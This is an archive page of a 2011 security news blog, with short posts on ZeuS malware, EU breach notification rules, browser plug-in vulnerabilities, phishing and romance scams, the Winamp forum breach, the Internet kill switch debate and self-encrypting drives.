The Security Detail

March 3, 2011  10:56 PM

The Gods Must Be Crazy…Or, At Least ZeuS

Tony Bradley Tony Bradley Profile: Tony Bradley

In Greek mythology, Zeus was the head honcho. But, he was a capricious, fallible, often vengeful god (aren’t they all?). Zeus seems like an apropos namesake for the massive, pervasive malware that threatens PC users.

The creator of ZeuS allegedly went into “retirement” last fall. Apparently, the malware business had taken its toll and he was ready to cash in on his ill-gotten gains to sip pina coladas on a beach in the Caribbean. So, he did the only sensible thing and turned over the source code for ZeuS to his arch-nemesis–the malware developer behind SpyEye.

ZeuS arrives in many forms, like FDIC phishing scams, or UPS phishing scams. AppRiver’s Fred Touchette provides an excellent analysis of the ZeuS botnet, and the emerging threat of hybrid ZeuS / SpyEye malware attacks.

*Bonus Note: If you have not seen the movie “The Gods Must Be Crazy“, I highly recommend it. It is one of the funniest movies I have ever seen.

*Bonus Bonus Note: Admittedly, it takes a certain sense of humor to relate. Some people don’t get it. If you are one of these people, perhaps watching it in an altered state might make it funnier.

February 27, 2011  11:18 AM

Prepare for Impending EU Data Breach Notification Mandate

Tony Bradley Tony Bradley Profile: Tony Bradley

As of May 25, 2011, new data breach notification rules will be enforced across the European Union. Despite increased awareness and efforts to implement technology to protect data, breaches seem to occur at an alarming rate. Users–those who trusted their personal information and sensitive data to a third-party organization–deserve to know when that information has been exposed or compromised in any way.

A recent discussion on the Zecurion Group on (you may have to at least be a member of LinkedIn, if not a member of the Zecurion Group to read this–joining is free) highlights the upcoming EU mandate, and provides an extensive, detailed look at the elements of the data breach notification rules and how to implement effective compliance.

The report shared in the Zecurion Group ends with this summary:

At any rate, ENISA already provides us with useful examples of practices in Europe, helping the stakeholders in their study of the question:

  • The risks should be clearly identified.
  • Breaches should be evaluated and prioritised before notifying it to data protection authorities and data subjects.
  • The means of notifications should be specifically decided by the operators and used without undue delay.
  • Regulatory authorities should strengthen compliance.
  • Private operators and data protection authorities should usefully cooperate to enforce the security through this new procedure.

February 27, 2011  9:59 AM

Is Your Browser Secure? I Doubt It

Tony Bradley Tony Bradley Profile: Tony Bradley

The various browser vendors continue to enhance the security in the browser with each new release. For example, Internet Explorer 9 is significantly more secure than Internet Explorer 6. But, even if you are using the latest version of your chosen Web browser and you have kept it patched and up to date, there is still only a one-in-five chance that your browser is secure.

A study conducted by Qualys found that 80 percent of Web browsers have holes. Or, as InformationWeek phrases it, “Roughly 80 percent of browsers today are insecure, owing to their having a known vulnerability either in the browser itself, or due to a vulnerable plug-in, such as an outdated version of Shockwave, Flash, the Java runtime environment, or QuickTime.”

The article goes on to state that more than half of the vulnerabilities stem from plug-ins, adding, “The most common insecure browser plug-ins in use are (in order): Java, Adobe Reader, QuickTime, Flash, Shockwave, and Windows Media Player. Many of these plug-ins are widespread–97 percent of computers have the Adobe Flash plug-in installed, and 95 percent have one for Windows Media Player.”

The problem is that the browsers generally have an automatic update feature of some sort, and users are pretty good about keeping the browser up to date, but forget about the plug-ins. Even with updated plug-ins, though, there are still known vulnerabilities that remain exposed in the browsers themselves as well.

You can employ third-party tools like Invincea Browser Protection for an extra layer of defense, or just exercise extreme caution when surfing the Web. Rather than treating your Web surfing like you are strolling through your own back yard with an armed security escort, think of it like you got lost on the wrong side of town, your cell phone battery is dead, and you are trying to navigate dark alleys at night to make it safely home.

February 27, 2011  9:27 AM

From the “WTF? Are You Serious??” Vault

Tony Bradley Tony Bradley Profile: Tony Bradley

I have a simple rule: If someone you don’t know asks you for money online, it is guaranteed to be a scam. There is a correlary that goes with the one simple rule: If someone you do know asks you for money online, you should pretend you don’t know them and follow the one simple rule.

The Nigerian fraud scam predates the World Wide Web, email, and the Internet, yet it remains suprisingly effective. It amazes me, though, that there are still people who aren’t familiar with the concept, or that are still gullible/naive enough to believe that an exiled Nigerian prince needs your help and wants to share his millions with you in appreciation. Seriously?

There are other variations–like the scam that a man from Naperville, IL fell victim to. This man has been under the misguided impression for two years that he is in a relationship with a mysterious woman on the Internet. He never actually met the woman, but that hasn’t stopped him from sending over $200,000 to her over the two years. You would think it might have raised a red flag or two when he was wiring money to accounts in multiple countries–including the United States, England, Malaysia, and…NIGERIA!

There is some humorous irony in that the scammer went too far by claiming to be kidnapped and requiring ransom–leading the Naperville man to involve authorities for “her” rescue. Instead, the police had to sit the guy down and break it to him that he has been getting scammed for two years and his “girlfriend” doesn’t exist.

February 25, 2011  10:23 PM

Apple Invites Scrutiny of Mac OS X Security

Tony Bradley Tony Bradley Profile: Tony Bradley

Apple unveiled details of the upcoming Mac OS X 10.7, a.k.a. “Lion”, a few months back. The company is still hard at work developing the OS, and apparently Apple is taking security much more seriously with this next release of the flagship OS.

Apple has reportedly invited expert security researchers to analyze an early preview release of the OS and provide feedback. Dino Dai Zovi–co-author of The Mac Hacker’s Handbook, and Charlie Miller–Dai Zovi’s co-author and perennial winner of the Pwn2Own race to hack the Mac, are among those invited to scrutinize Lion.

According to a report from ComputerWorld’s Greg Keizer, the researchers must agree to an NDA which bars them from sharing anything they might find with the public. Keizer quotes Miller, stating, “They’ve never done this before. That they’re thinking of reaching out [to researchers] is a good positive step, but whether it makes a difference, I’ll believe it when I see it.”

February 24, 2011  3:39 PM

PayPal Users Targeted by Phishing Attack…Again

Tony Bradley Tony Bradley Profile: Tony Bradley

It just sort of comes with the territory. If you have a massive financial network online that allows people to transfer money back and forth, the dark side of the Internet is going to recognize the opportunity that presents and take advantage of it. The fact that most of the PayPal users are not all that technically savvy and no little about information security just makes them that much more attractive targets.

Fred Touchette from AppRiver has a detailed breakdown of this latest threat. He notes that this particular PayPal phishing scam is unique in its brazen approach and lack of attempt to hide the source of the attack. “Notice how they request in the email that you enable Javascript and ActiveX? This is so the functionality in the attachment will post your information properly. I can’t say I’ve seen this in the body of a phishing email before. That could be in part to the popularity of plug-ins such as NoScript for Firefox, or the built in script squashing functionality of the Chrome browser that doesn’t allow hidden Javascript to run without approval.”

The phishing email contains the obligatory spelling and grammatical errors that should be red flags to any recipient above the third or fourth grade level. In closing, let me just remind everyone once again not to open file attachments–especially file attachments claiming to be from some financial institution you do business with directing you to fill out some attached form. PayPal, your bank, and any other reputable business will not ask you for sensitive information via email or with a file attachment.

February 21, 2011  12:54 PM

Apple Looks to Protect Data with “Safe Deposit Box”

Tony Bradley Tony Bradley Profile: Tony Bradley

Based on a recent patent filing with the United States Patent and Trademark Office, Apple has plans to imitate a bank safe deposit box with a digital version designed to protect sensitive data.

A post from provides a detailed look at how the patent application describes the potential data security measure. Basically, the “safe deposit box” would be a folder or partition specifically designated for secure storage. Files that dragged to the safe deposit box would have additional security measures in place and require user authentication to access–a’ la verifying one’s identity and providing the necessary key in order to access a bank safe deposit box.

But, imagine if your bank somehow duplicated your sensitive and priceless possessions from your safe deposit box, and stored the copies in another safe deposit box at another bank as an added precaution? Well, Apple plans to do that as well. Files stored in the safe deposit box will be automatically copied to secure storage in the cloud.

Conceptually, it sounds nice. But, like most approaches to data protection the Achilles heel is the user. The success or value of an approach like this relies on the user’s ability to determine what data is important or sensitive, and the user’s execution to make sure the data gets stored in the right folder.

Assuming a user with the ability and willingess to follow through, the safe deposit box seems like a reasonable method of data protection.

February 21, 2011  12:10 PM

Winamp Forums Security Breached

Tony Bradley Tony Bradley Profile: Tony Bradley

A post on the Winamp Forums titled Winamp Forums Security Breach FAQ explains that a security breach was detected. The post states, “My name is Geno Yoham and I am the General Manager of Winamp. Our entire team is dedicated to protecting the privacy of our users and has put extensive measures in place to ensure your information remains secure. As a result of these precautions, we quickly detected and blocked an attack on the Winamp Forums database. We have confirmed that this breach was isolated to the Winamp Forum ( site only. Other Winamp sites and products such as, and the Winamp Desktop Media Player were not affected in any way.”

The FAQ response to the questions “What happened?” is ambiguous and elusive: “As a result of our continuous security monitoring, we identified and blocked this attack. Additionally, new security measures have been deployed to help keep this type of breach from happening in the future.”

Great, but um…..what happened?

Winamp claims that there is no evidence that any information other than email addresses was exposed, but it is directing Winamp Forums users to change their account passwords as a precaution. The FAQ also reiterates that standard security best practices suggest that users should be changing their passwords regularly anyway.

February 19, 2011  7:06 AM

The Internet “Kill Switch” Controversy

Tony Bradley Tony Bradley Profile: Tony Bradley

When protests gained momentum in Egypt, the government forced the shutdown of Internet access and other forms of communication to prevent protesters from being able to work together and organize effectively. The same thing is going on in other countries faced with political upheaval as well.

At face value, giving the government the ability to shut off such a critical lifeline to the world as the Internet seems ridiculous. However, there are actually some legitimate cases where the government might want such a capability–not to oppress the people, but to defend them.

As Americans, we don’t want the government to have any undue power or control. But, a case can be made that it is in our best interests from a national security perspective to allow the government to shut off portions of the Internet in the event of a cyber attack against the nation. Shutting down the effected portions of the Internet can contain the threat and prevent any further spread or damage while responding to the attack.

According to an article on the Senate bill from USA Today, “The Cybersecurity and Internet Freedom Act aims to protect critical infrastructures that Americans rely on–the power grid, financial systems and water supply, among other things–in the event of a potentially crippling digital assault. It does not, as its authors say, give anyone the authority to choke off the Internet with the flick of a so-called “kill switch,” as some of its critics contend.”

I get it. The country is very polarized in its political alignment, and we only trust administrations we support. Armed political militias and rhetoric about defending the Constitution all but died during the Bush administration–while the government pushed through the PATRIOT Act without debate or reasonable consideration, and illegally spied on citizens, and found clever loopholes allowing prisoners to be “legally” tortured and circumventing the Fourth, Fifth, and Sixth amendments to the Constitution.

Yet, suddenly when the Obama administration wants to solve the healthcare epidemic armed militias show up at rallies, and conservative mouthpieces like Glenn Beck and Rush Limbaugh stoke the fires of tinfoil hat conspiracy theorists suggesting the President is not an American citizen, or he’s a Muslim (as if that would somehow disqualfy him for the office of President).

Conversely, I was quite sure that Bush, Cheney, and Rove had an overt disdain for the Constitution and how it got in the way of them doing what they wanted to do, and that the Bush administration did more damage to the United States and the world than any government leadership of any nation in decades. Yet, I fully support President Obama and I have faith that he is focused on the best interests of the nation.

My point is, I am sure that the reality lies somewhere in the middle, and the government has an obligation to protect and defend the nation. Cries of “kill switch” are akin to cries of “death panel” in the healthcare debate, or the “birther” movement to prove President Obama is not an American citizen. They are silly, ridiculous distractions.

I don’t know if the bill currently before the Senate is the right bill to get the job done. But, I do know it  addresses a need, and that it should be considered and debated–rationally.

February 14, 2011  11:49 AM

Seagate Announces Milestone for Self-Encrypting Drives

Tony Bradley Tony Bradley Profile: Tony Bradley

Seagate announced a major milestone at the RSA Security Conference: it has shipped over a million self-encrypting laptop and enterprise hard drives. Six major manufacturers–including Dell and Fujitsu–have helped drive the success of the drives.

Laptops in particular are easily lost or stolen, and often contain gigabytes upon gigabytes of confidential company information, or private client or customer data. It is critical to protect that data–and for many organizations it is mandated by compliance requirements. Seagate’s Momentus self-encrypting drives (SEDs) can help ensure that the data is not compromised or exposed.

The Seagate press release explains, “The AES encryption chip in the Momentus SEDs automatically and transparently encrypts all drive data, not just selected files or partitions. The 2.5-inch drive also eliminates disk initialization and configuration required by encryption software, allows IT administrators to instantly erase all data cryptographically so the drive can be quickly and easily redeployed, and delivers full inline-speed encryption with no impact to system performance.”

With more vendor support and industry cooperation, as well as government certifications, it may not take long for Seagate to hit that two million mark.

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: